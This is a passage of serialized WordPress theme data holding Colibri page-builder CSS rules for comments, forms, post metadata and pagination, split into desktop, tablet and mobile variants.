text-decoration: none;\n  font-size: 14px;\n  color: rgb(70, 112, 127);\n  background-color: unset;\n  background-image: none;\n  transition-duration: 0.5s;\n}\n#colibri .style-101 .comment-metadata:hover {\n  color: #17252a;\n}\n#colibri .style-101 .comment-metadata:hover {\n  color: #17252a;\n}\n#colibri .style-101 .comment-author .url {\n  font-weight: 600;\n  font-style: normal;\n  text-decoration: none;\n  color: rgb(23, 37, 42);\n  background-color: unset;\n  background-image: none;\n  margin-left: 5px;\n}\n#colibri .style-101 .comment-author img {\n  width: 30px ;\n  height: 30px;\n  background-color: unset;\n  background-image: none;\n  border-top-width: 0px;\n  border-top-style: none;\n  border-top-left-radius: 300px;\n  border-top-right-radius: 300px;\n  border-right-width: 0px;\n  border-right-style: none;\n  border-bottom-width: 0px;\n  border-bottom-style: none;\n  border-bottom-left-radius: 300px;\n  border-bottom-right-radius: 300px;\n  border-left-width: 0px;\n  border-left-style: none;\n}\n#colibri .style-101 .comment-meta {\n  color: rgb(153, 153, 153);\n  margin-bottom: 16px;\n}\n#colibri .style-101 .comments-title {\n  font-family: Open Sans;\n  font-weight: 600;\n  text-decoration: none;\n  font-size: 1.25em;\n  color: #17252a;\n}\n#colibri .style-101 .comment.odd {\n  background-color: rgba(166, 220, 244, 0.1);\n  background-image: none;\n  border-top-width: 0px;\n  border-top-style: none;\n  border-top-left-radius: 5px;\n  border-top-right-radius: 5px;\n  border-right-width: 0px;\n  border-right-style: none;\n  border-bottom-width: 0px;\n  border-bottom-style: none;\n  border-bottom-left-radius: 5px;\n  border-bottom-right-radius: 5px;\n  border-left-width: 0px;\n  border-left-style: none;\n  padding-top: 12px;\n  padding-right: 12px;\n  padding-bottom: 12px;\n  padding-left: 12px;\n}\n#colibri .style-101 .comment.even {\n  background-color: #FFFFFF;\n  background-image: none;\n  border-top-width: 0px;\n  border-top-style: none;\n  border-top-left-radius: 5px;\n  border-top-right-radius: 5px;\n  border-right-width: 0px;\n  border-right-style: none;\n  border-bottom-width: 0px;\n  border-bottom-style: none;\n  border-bottom-left-radius: 5px;\n  border-bottom-right-radius: 5px;\n  border-left-width: 0px;\n  border-left-style: none;\n  padding-top: 12px;\n  padding-right: 12px;\n  padding-bottom: 12px;\n  padding-left: 12px;\n}\n#colibri .style-101 .blog-post-comments {\n  border-top-width: 1px;\n  border-top-color: rgb(238, 238, 238);\n  border-top-style: solid;\n  border-right-width: 0px;\n  border-right-color: rgb(238, 238, 238);\n  border-right-style: solid;\n  border-bottom-width: 0px;\n  border-bottom-color: rgb(238, 238, 238);\n  border-bottom-style: solid;\n  border-left-width: 0px;\n  border-left-color: rgb(238, 238, 238);\n  border-left-style: solid;\n  padding-top: 15px;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:102;a:3:{s:7:\"desktop\";s:4032:\"#colibri .comment-respond {\n  border-top-width: 1px;\n  border-top-color: rgb(238, 238, 238);\n  border-top-style: solid;\n  border-right-width: 0px;\n  border-right-color: rgb(238, 238, 238);\n  border-right-style: solid;\n  border-bottom-width: 0px;\n  border-bottom-color: rgb(238, 238, 238);\n  border-bottom-style: solid;\n  border-left-width: 0px;\n  border-left-color: rgb(238, 238, 238);\n  border-left-style: solid;\n  padding-top: 15px;\n}\n#colibri .comment-respond .comment-notes {\n  font-family: Open Sans;\n  font-weight: 400;\n  font-size: 14px;\n  color: rgb(70, 112, 127);\n}\n#colibri .comment-respond .comment-form [type=\"submit\"] {\n  background-color: #03a9f4;\n  background-image: none;\n  border-top-width: 2px;\n  border-top-color: #03a9f4;\n  border-top-style: solid;\n  border-top-left-radius: 5px;\n  border-top-right-radius: 5px;\n  border-right-width: 2px;\n  border-right-color: #03a9f4;\n  border-right-style: solid;\n  border-bottom-width: 2px;\n  border-bottom-color: #03a9f4;\n  border-bottom-style: solid;\n  border-bottom-left-radius: 5px;\n  border-bottom-right-radius: 5px;\n  border-left-width: 2px;\n  border-left-color: #03a9f4;\n  border-left-style: solid;\n  padding-top: 12px;\n  padding-right: 24px;\n  padding-bottom: 12px;\n  padding-left: 24px;\n  font-family: Open Sans;\n  font-weight: 600;\n  text-transform: uppercase;\n  font-size: 12px;\n  line-height: 1;\n  letter-spacing: 1px;\n  color: #FFFFFF;\n}\n#colibri .comment-respond .comment-form [type=\"submit\"]:hover {\n  background-color: rgb(2, 110, 159);\n  border-top-color: rgb(2, 110, 159);\n  border-right-color: rgb(2, 110, 159);\n  border-bottom-color: rgb(2, 110, 159);\n  border-left-color: rgb(2, 110, 159);\n}\n#colibri .comment-respond .comment-form [type=\"submit\"]:hover {\n  background-color: rgb(2, 110, 159);\n  border-top-color: rgb(2, 110, 159);\n  border-right-color: rgb(2, 110, 159);\n  border-bottom-color: rgb(2, 110, 159);\n  border-left-color: rgb(2, 110, 159);\n}\n#colibri .comment-respond .comment-form [type=\"submit\"]:active {\n  background-color: #03a9f4;\n  background-image: none;\n  border-top-width: 2px;\n  border-top-color: #03a9f4;\n  border-top-style: solid;\n  border-top-left-radius: 5px;\n  border-top-right-radius: 5px;\n  border-right-width: 2px;\n  border-right-color: #03a9f4;\n  border-right-style: solid;\n  border-bottom-width: 2px;\n  border-bottom-color: #03a9f4;\n  border-bottom-style: solid;\n  border-bottom-left-radius: 5px;\n  border-bottom-right-radius: 5px;\n  border-left-width: 2px;\n  border-left-color: #03a9f4;\n  border-left-style: solid;\n  padding-top: 12px;\n  padding-right: 24px;\n  padding-bottom: 12px;\n  padding-left: 24px;\n  font-family: Open Sans;\n  font-weight: 600;\n  text-transform: uppercase;\n  font-size: 12px;\n  line-height: 1;\n  letter-spacing: 1px;\n  color: #FFFFFF;\n}\n#colibri .comment-respond input:not([type=\"submit\"]),#colibri .comment-respond textarea {\n  border-top-width: 1px;\n  border-top-color: rgb(238, 238, 238);\n  border-top-style: solid;\n  border-top-left-radius: 5px;\n  border-top-right-radius: 5px;\n  border-right-width: 1px;\n  border-right-color: rgb(238, 238, 238);\n  border-right-style: solid;\n  border-bottom-width: 1px;\n  border-bottom-color: rgb(238, 238, 238);\n  border-bottom-style: solid;\n  border-bottom-left-radius: 5px;\n  border-bottom-right-radius: 5px;\n  border-left-width: 1px;\n  border-left-color: rgb(238, 238, 238);\n  border-left-style: solid;\n  font-family: Open Sans;\n  font-weight: 400;\n  font-size: 16px;\n  color: rgb(37, 41, 42);\n  background-color: rgba(0,0,0,0);\n  background-image: none;\n  padding-top: 5px;\n  padding-right: 5px;\n  padding-bottom: 5px;\n  padding-left: 5px;\n}\n#colibri .comment-respond label {\n  color: rgb(37, 41, 42);\n  border-top-width: 0px;\n  border-top-style: none;\n  border-right-width: 0px;\n  border-right-style: none;\n  border-bottom-width: 0px;\n  border-bottom-style: none;\n  border-left-width: 0px;\n  border-left-style: none;\n}\n#colibri .comment-respond .comment-reply-title {\n  font-family: Open Sans;\n  font-weight: 600;\n  font-size: 1.25em;\n  color: #17252a;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:103;a:3:{s:7:\"desktop\";s:45:\"#colibri .style-103 {\n  margin-top: -30px;\n}\n\";s:6:\"tablet\";s:45:\"#colibri .style-103 {\n  margin-top: -15px;\n}\n\";s:6:\"mobile\";s:0:\"\";}i:104;a:3:{s:7:\"desktop\";s:104:\"#colibri .style-104 {\n  height: auto;\n  min-height: unset;\n  padding-top: 0px;\n  padding-bottom: 0px;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:105;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:106;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:107;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:108;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:109;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:110;a:3:{s:7:\"desktop\";s:542:\"#colibri .style-110 {\n  text-align: center;\n  height: auto;\n  min-height: unset;\n  background-color: #FFFFFF;\n  background-image: none;\n  box-shadow: 0px 10px 40px 0px rgba(1, 51, 74, 0.15) ;\n  border-top-width: 0px;\n  border-top-style: none;\n  border-top-left-radius: 5px;\n  border-top-right-radius: 5px;\n  border-right-width: 0px;\n  border-right-style: none;\n  border-bottom-width: 0px;\n  border-bottom-style: none;\n  border-bottom-left-radius: 5px;\n  border-bottom-right-radius: 5px;\n  border-left-width: 0px;\n  border-left-style: none;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:111;a:3:{s:7:\"desktop\";s:269:\"#colibri .style-111 {\n  background-color: rgba(255,255,255,0);\n  background-image: none;\n  text-align: center;\n  margin-bottom: 0px;\n}\n#colibri .style-111 .colibri-post-thumbnail-shortcode img {\n  height: 300px;\n  object-position: center center;\n  object-fit: cover;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:112;a:3:{s:7:\"desktop\";s:46:\"#colibri .style-112 {\n  margin-bottom: 0px;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:113;a:3:{s:7:\"desktop\";s:543:\".style-113 > .h-y-container > *:not(:last-child) {\n  margin-bottom: 10px;\n}\n#colibri .style-113 {\n  text-align: left;\n  height: auto;\n  min-height: unset;\n  border-top-width: 0px;\n  border-top-color: rgb(238, 238, 238);\n  border-top-style: solid;\n  border-right-width: 0px;\n  border-right-color: rgb(238, 238, 238);\n  border-right-style: solid;\n  border-bottom-width: 1px;\n  border-bottom-color: rgb(238, 238, 238);\n  border-bottom-style: solid;\n  border-left-width: 0px;\n  border-left-color: rgb(238, 238, 238);\n  border-left-style: solid;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:46:\"#colibri .style-113 {\n  text-align: center;\n}\n\";}i:114;a:3:{s:7:\"desktop\";s:524:\"#colibri .style-114 {\n  margin-bottom: 0px;\n}\n#colibri .style-114 svg {\n  width: 18px ;\n  height: 18px;\n  display: none;\n  margin-right: 5px;\n}\n#colibri .style-114 .metadata-suffix {\n  font-size: 14px;\n  color: rgb(37, 41, 42);\n}\n#colibri .style-114 .metadata-prefix {\n  font-size: 14px;\n  color: rgb(37, 41, 42);\n}\n#colibri .style-114 a {\n  text-decoration: none;\n  font-size: 14px;\n  color: rgb(70, 112, 127);\n}\n#colibri .style-114 a:hover {\n  color: rgb(0, 0, 0);\n}\n#colibri .style-114 a:hover {\n  color: rgb(0, 0, 0);\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:115;a:3:{s:7:\"desktop\";s:478:\"#colibri .style-115 svg {\n  width: 18px ;\n  height: 18px;\n  display: none;\n  margin-right: 5px;\n}\n#colibri .style-115 .metadata-suffix {\n  font-size: 14px;\n  color: rgb(37, 41, 42);\n}\n#colibri .style-115 .metadata-prefix {\n  font-size: 14px;\n  color: rgb(37, 41, 42);\n}\n#colibri .style-115 a {\n  text-decoration: none;\n  font-size: 14px;\n  color: rgb(70, 112, 127);\n}\n#colibri .style-115 a:hover {\n  color: rgb(0, 0, 0);\n}\n#colibri .style-115 a:hover {\n  color: rgb(0, 0, 0);\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:116;a:3:{s:7:\"desktop\";s:198:\"#colibri .style-116 h1,#colibri .style-116  h2,#colibri .style-116  h3,#colibri .style-116  h4,#colibri .style-116  h5,#colibri .style-116  h6 {\n  margin-bottom: 0px;\n  transition-duration: 0.5s;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:117;a:3:{s:7:\"desktop\";s:72:\"#colibri .style-117 .colibri-post-excerpt {\n  color: rgb(37, 41, 42);\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:118;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:119;a:3:{s:7:\"desktop\";s:157:\".style-119 > .h-y-container > *:not(:last-child) {\n  margin-bottom: 10px;\n}\n#colibri .style-119 {\n  text-align: left;\n  height: auto;\n  min-height: unset;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:120;a:3:{s:7:\"desktop\";s:293:\"#colibri .style-120 svg {\n  width: 24px ;\n  height: 24px;\n  display: inline-block;\n  margin-right: 5px;\n}\n#colibri .style-120 a {\n  text-decoration: none;\n  color: #03a9f4;\n}\n#colibri .style-120 a:hover {\n  color: rgb(2, 110, 159);\n}\n#colibri .style-120 a:hover {\n  color: rgb(2, 110, 159);\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:121;a:3:{s:7:\"desktop\";s:158:\".style-121 > .h-y-container > *:not(:last-child) {\n  margin-bottom: 10px;\n}\n#colibri .style-121 {\n  text-align: right;\n  height: auto;\n  min-height: unset;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:122;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:123;a:3:{s:7:\"desktop\";s:800:\"#colibri .style-123-icon {\n  width: 16px;\n  height: 16px;\n  margin-right: 0px;\n  margin-left: 5px;\n}\n#colibri .style-123 {\n  text-align: center;\n  font-family: Open Sans;\n  font-weight: 400;\n  font-size: 16px;\n  line-height: 1.6;\n  color: #03a9f4;\n  border-top-width: 2px;\n  border-top-style: none;\n  border-top-left-radius: 5px;\n  border-top-right-radius: 5px;\n  border-right-width: 2px;\n  border-right-style: none;\n  border-bottom-width: 2px;\n  border-bottom-style: none;\n  border-bottom-left-radius: 5px;\n  border-bottom-right-radius: 5px;\n  border-left-width: 2px;\n  border-left-style: none;\n}\n#colibri .style-123:hover,#colibri .style-123:focus {\n  color: rgb(2, 110, 159);\n}\n#colibri .style-123:active .style-123-icon {\n  width: 16px;\n  height: 16px;\n  margin-right: 0px;\n  margin-left: 5px;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:124;a:3:{s:7:\"desktop\";s:473:\"#colibri .style-124 {\n  border-top-width: 1px;\n  border-top-color: rgb(224, 224, 224);\n  border-top-style: solid;\n  border-right-width: 0px;\n  border-right-color: rgb(224, 224, 224);\n  border-right-style: solid;\n  border-bottom-width: 0px;\n  border-bottom-color: rgb(224, 224, 224);\n  border-bottom-style: solid;\n  border-left-width: 0px;\n  border-left-color: rgb(224, 224, 224);\n  border-left-style: solid;\n  margin-top: 45px;\n  margin-right: 30px;\n  margin-left: 30px;\n}\n\";s:6:\"tablet\";s:67:\"#colibri .style-124 {\n  margin-right: 10px;\n  margin-left: 10px;\n}\n\";s:6:\"mobile\";s:67:\"#colibri .style-124 {\n  margin-right: 10px;\n  margin-left: 10px;\n}\n\";}i:125;a:3:{s:7:\"desktop\";s:106:\"#colibri .style-125 {\n  text-align: center;\n  height: auto;\n  min-height: unset;\n  padding-right: 15px;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:126;a:3:{s:7:\"desktop\";s:885:\"#colibri .style-126 .nav-links .prev-navigation a,#colibri .style-126 .nav-links .next-navigation a {\n  text-decoration: none;\n  color: rgb(23, 37, 42);\n  border-top-width: 2px;\n  border-top-color: black;\n  border-top-style: none;\n  border-top-left-radius: 0px;\n  border-top-right-radius: 0px;\n  border-right-width: 2px;\n  border-right-color: black;\n  border-right-style: none;\n  border-bottom-width: 2px;\n  border-bottom-color: black;\n  border-bottom-style: none;\n  border-bottom-left-radius: 0px;\n  border-bottom-right-radius: 0px;\n  border-left-width: 2px;\n  border-left-color: black;\n  border-left-style: none;\n}\n#colibri .style-126 .nav-links .prev-navigation a:hover,#colibri .style-126 .nav-links .next-navigation a:hover {\n  color: #03a9f4;\n}\n#colibri .style-126 .nav-links .prev-navigation a:hover,#colibri .style-126 .nav-links .next-navigation a:hover {\n  color: #03a9f4;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:127;a:3:{s:7:\"desktop\";s:83:\"#colibri .style-127 {\n  text-align: center;\n  height: auto;\n  min-height: unset;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:128;a:3:{s:7:\"desktop\";s:296:\"#colibri .style-128 .page-numbers {\n  margin-right: 10px;\n  color: rgb(23, 37, 42);\n}\n#colibri .style-128 .page-numbers:hover {\n  color: #03a9f4;\n}\n#colibri .style-128 .page-numbers:hover {\n  color: #03a9f4;\n}\n#colibri .style-128 .page-numbers.current {\n  margin-right: 10px;\n  color: #03a9f4;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:129;a:3:{s:7:\"desktop\";s:105:\"#colibri .style-129 {\n  text-align: center;\n  height: auto;\n  min-height: unset;\n  padding-left: 15px;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:130;a:3:{s:7:\"desktop\";s:893:\"#colibri .style-130 .nav-links .prev-navigation a,#colibri .style-130 .nav-links .next-navigation a {\n  text-decoration: none;\n  color: rgb(23, 37, 42);\n  border-top-width: 2px;\n  border-top-color: #17252a;\n  border-top-style: none;\n  border-top-left-radius: 0px;\n  border-top-right-radius: 0px;\n  border-right-width: 2px;\n  border-right-color: #17252a;\n  border-right-style: none;\n  border-bottom-width: 2px;\n  border-bottom-color: #17252a;\n  border-bottom-style: none;\n  border-bottom-left-radius: 0px;\n  border-bottom-right-radius: 0px;\n  border-left-width: 2px;\n  border-left-color: #17252a;\n  border-left-style: none;\n}\n#colibri .style-130 .nav-links .prev-navigation a:hover,#colibri .style-130 .nav-links .next-navigation a:hover {\n  color: #03a9f4;\n}\n#colibri .style-130 .nav-links .prev-navigation a:hover,#colibri .style-130 .nav-links .next-navigation a:hover {\n  color: #03a9f4;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:131;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:132;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:133;a:3:{s:7:\"desktop\";s:83:\"#colibri .style-133 {\n  text-align: center;\n  height: auto;\n  min-height: unset;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:134;a:3:{s:7:\"desktop\";s:363:\"#colibri .style-134 p,#colibri .style-134  h1,#colibri .style-134  h2,#colibri .style-134  h3,#colibri .style-134  h4,#colibri .style-134  h5,#colibri .style-134  h6 {\n  font-size: 10em;\n  color: rgb(23, 37, 42);\n}\n#colibri .style-134 .text-wrapper-fancy svg path {\n  stroke: #000000;\n  stroke-linejoin: initial;\n  stroke-linecap: initial;\n  stroke-width: 8px;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:135;a:3:{s:7:\"desktop\";s:107:\"#colibri .style-135 ul {\n  list-style-type: disc;\n}\n#colibri .style-135 ol {\n  list-style-type: decimal;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:136;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:137;a:3:{s:7:\"desktop\";s:1300:\"#colibri .style-137-icon {\n  width: 16px;\n  height: 16px;\n  margin-right: 0px;\n  margin-left: 10px;\n}\n#colibri .style-137 {\n  background-color: rgba(3, 169, 244, 0);\n  background-image: none;\n  font-family: Open Sans;\n  font-weight: 400;\n  text-transform: none;\n  font-size: 16px;\n  line-height: 1.5em;\n  letter-spacing: 1px;\n  color: #03a9f4;\n  border-top-width: 2px;\n  border-top-color: #03a9f4;\n  border-top-style: none;\n  border-top-left-radius: 5px;\n  border-top-right-radius: 5px;\n  border-right-width: 2px;\n  border-right-color: #03a9f4;\n  border-right-style: none;\n  border-bottom-width: 2px;\n  border-bottom-color: #03a9f4;\n  border-bottom-style: none;\n  border-bottom-left-radius: 5px;\n  border-bottom-right-radius: 5px;\n  border-left-width: 2px;\n  border-left-color: #03a9f4;\n  border-left-style: none;\n  padding-top: 0px;\n  padding-right: 0px;\n  padding-bottom: 0px;\n  padding-left: 0px;\n  text-align: center;\n}\n#colibri .style-137:hover,#colibri .style-137:focus {\n  background-color: rgba(2, 110, 159, 0);\n  border-top-color: rgb(2, 110, 159);\n  border-right-color: rgb(2, 110, 159);\n  border-bottom-color: rgb(2, 110, 159);\n  border-left-color: rgb(2, 110, 159);\n}\n#colibri .style-137:active .style-137-icon {\n  width: 16px;\n  height: 16px;\n  margin-right: 0px;\n  margin-left: 10px;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:138;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:139;a:3:{s:7:\"desktop\";s:67:\"#colibri .style-139 {\n  padding-top: 0px;\n  padding-bottom: 0px;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:140;a:3:{s:7:\"desktop\";s:540:\"#colibri .style-140 {\n  text-align: left;\n  height: auto;\n  min-height: unset;\n  background-color: #FFFFFF;\n  background-image: none;\n  box-shadow: 0px 10px 40px 0px rgba(1, 51, 74, 0.15) ;\n  border-top-width: 0px;\n  border-top-style: none;\n  border-top-left-radius: 5px;\n  border-top-right-radius: 5px;\n  border-right-width: 0px;\n  border-right-style: none;\n  border-bottom-width: 0px;\n  border-bottom-style: none;\n  border-bottom-left-radius: 5px;\n  border-bottom-right-radius: 5px;\n  border-left-width: 0px;\n  border-left-style: none;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:141;a:3:{s:7:\"desktop\";s:46:\"#colibri .style-141 {\n  margin-bottom: 0px;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:142;a:3:{s:7:\"desktop\";s:81:\"#colibri .style-142 {\n  text-align: left;\n  height: auto;\n  min-height: unset;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:143;a:3:{s:7:\"desktop\";s:433:\"#colibri .style-143 .categories-prefix {\n  margin-right: 16px;\n}\n#colibri .style-143 a,#colibri .style-143  .colibri-post-category {\n  margin-right: 10px;\n  text-transform: lowercase;\n  font-size: 14px;\n  color: rgb(70, 112, 127);\n}\n#colibri .style-143 a:hover,#colibri .style-143  .colibri-post-category:hover {\n  color: #17252a;\n}\n#colibri .style-143 a:hover,#colibri .style-143  .colibri-post-category:hover {\n  color: #17252a;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:144;a:3:{s:7:\"desktop\";s:169:\"#colibri .style-144 h1,#colibri .style-144  h2,#colibri .style-144  h3,#colibri .style-144  h4,#colibri .style-144  h5,#colibri .style-144  h6 {\n  margin-bottom: 0px;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:145;a:3:{s:7:\"desktop\";s:567:\"#colibri .style-145 .meta-separator {\n  color: rgb(70, 112, 127);\n}\n#colibri .style-145 svg {\n  width: 24px ;\n  height: 24px;\n  margin-right: 5px;\n  display: none;\n}\n#colibri .style-145 .metadata-suffix {\n  font-size: 14px;\n  color: rgb(70, 112, 127);\n}\n#colibri .style-145 .metadata-prefix {\n  font-size: 14px;\n  color: rgb(37, 41, 42);\n}\n#colibri .style-145 a {\n  text-decoration: none;\n  text-transform: lowercase;\n  font-size: 14px;\n  color: rgb(70, 112, 127);\n}\n#colibri .style-145 a:hover {\n  color: #17252a;\n}\n#colibri .style-145 a:hover {\n  color: #17252a;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:146;a:3:{s:7:\"desktop\";s:72:\"#colibri .style-146 .colibri-post-excerpt {\n  color: rgb(37, 41, 42);\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:147;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:148;a:3:{s:7:\"desktop\";s:562:\"#colibri .style-148-icon {\n  width: 16px;\n  height: 16px;\n  margin-right: 0px;\n  margin-left: 5px;\n}\n#colibri .style-148 {\n  text-align: center;\n  font-family: Open Sans;\n  font-weight: 400;\n  font-size: 16px;\n  line-height: 1.6;\n  color: #03a9f4;\n  border-top-style: none;\n  border-right-style: none;\n  border-bottom-style: none;\n  border-left-style: none;\n}\n#colibri .style-148:hover,#colibri .style-148:focus {\n  color: rgb(2, 110, 159);\n}\n#colibri .style-148:active .style-148-icon {\n  width: 16px;\n  height: 16px;\n  margin-right: 0px;\n  margin-left: 5px;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:149;a:3:{s:7:\"desktop\";s:473:\"#colibri .style-149 {\n  border-top-width: 1px;\n  border-top-color: rgb(224, 224, 224);\n  border-top-style: solid;\n  border-right-width: 0px;\n  border-right-color: rgb(224, 224, 224);\n  border-right-style: solid;\n  border-bottom-width: 0px;\n  border-bottom-color: rgb(224, 224, 224);\n  border-bottom-style: solid;\n  border-left-width: 0px;\n  border-left-color: rgb(224, 224, 224);\n  border-left-style: solid;\n  margin-top: 45px;\n  margin-right: 30px;\n  margin-left: 30px;\n}\n\";s:6:\"tablet\";s:67:\"#colibri .style-149 {\n  margin-right: 15px;\n  margin-left: 15px;\n}\n\";s:6:\"mobile\";s:67:\"#colibri .style-149 {\n  margin-right: 10px;\n  margin-left: 10px;\n}\n\";}i:150;a:3:{s:7:\"desktop\";s:83:\"#colibri .style-150 {\n  text-align: center;\n  height: auto;\n  min-height: unset;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:151;a:3:{s:7:\"desktop\";s:106:\"#colibri .style-151 {\n  text-align: center;\n  height: auto;\n  min-height: unset;\n  padding-right: 15px;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:152;a:3:{s:7:\"desktop\";s:889:\"#colibri .style-152 .nav-links .prev-navigation a,#colibri .style-152 .nav-links .next-navigation a {\n  text-decoration: none;\n  color: rgb(23, 37, 42);\n  border-top-width: 2px;\n  border-top-color: black;\n  border-top-style: none;\n  border-top-left-radius: 10px;\n  border-top-right-radius: 10px;\n  border-right-width: 2px;\n  border-right-color: black;\n  border-right-style: none;\n  border-bottom-width: 2px;\n  border-bottom-color: black;\n  border-bottom-style: none;\n  border-bottom-left-radius: 10px;\n  border-bottom-right-radius: 10px;\n  border-left-width: 2px;\n  border-left-color: black;\n  border-left-style: none;\n}\n#colibri .style-152 .nav-links .prev-navigation a:hover,#colibri .style-152 .nav-links .next-navigation a:hover {\n  color: #03a9f4;\n}\n#colibri .style-152 .nav-links .prev-navigation a:hover,#colibri .style-152 .nav-links .next-navigation a:hover {\n  color: #03a9f4;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:153;a:3:{s:7:\"desktop\";s:83:\"#colibri .style-153 {\n  text-align: center;\n  height: auto;\n  min-height: unset;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:154;a:3:{s:7:\"desktop\";s:366:\"#colibri .style-154 .page-numbers {\n  margin-right: 10px;\n  font-size: 16px;\n  line-height: 1.6;\n  color: #17252a;\n}\n#colibri .style-154 .page-numbers:hover {\n  color: #03a9f4;\n}\n#colibri .style-154 .page-numbers:hover {\n  color: #03a9f4;\n}\n#colibri .style-154 .page-numbers.current {\n  margin-right: 10px;\n  font-size: 16px;\n  line-height: 1.6;\n  color: #03a9f4;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:155;a:3:{s:7:\"desktop\";s:105:\"#colibri .style-155 {\n  text-align: center;\n  height: auto;\n  min-height: unset;\n  padding-left: 15px;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:156;a:3:{s:7:\"desktop\";s:889:\"#colibri .style-156 .nav-links .prev-navigation a,#colibri .style-156 .nav-links .next-navigation a {\n  text-decoration: none;\n  color: rgb(23, 37, 42);\n  border-top-width: 2px;\n  border-top-color: black;\n  border-top-style: none;\n  border-top-left-radius: 10px;\n  border-top-right-radius: 10px;\n  border-right-width: 2px;\n  border-right-color: black;\n  border-right-style: none;\n  border-bottom-width: 2px;\n  border-bottom-color: black;\n  border-bottom-style: none;\n  border-bottom-left-radius: 10px;\n  border-bottom-right-radius: 10px;\n  border-left-width: 2px;\n  border-left-color: black;\n  border-left-style: none;\n}\n#colibri .style-156 .nav-links .prev-navigation a:hover,#colibri .style-156 .nav-links .next-navigation a:hover {\n  color: #03a9f4;\n}\n#colibri .style-156 .nav-links .prev-navigation a:hover,#colibri .style-156 .nav-links .next-navigation a:hover {\n  color: 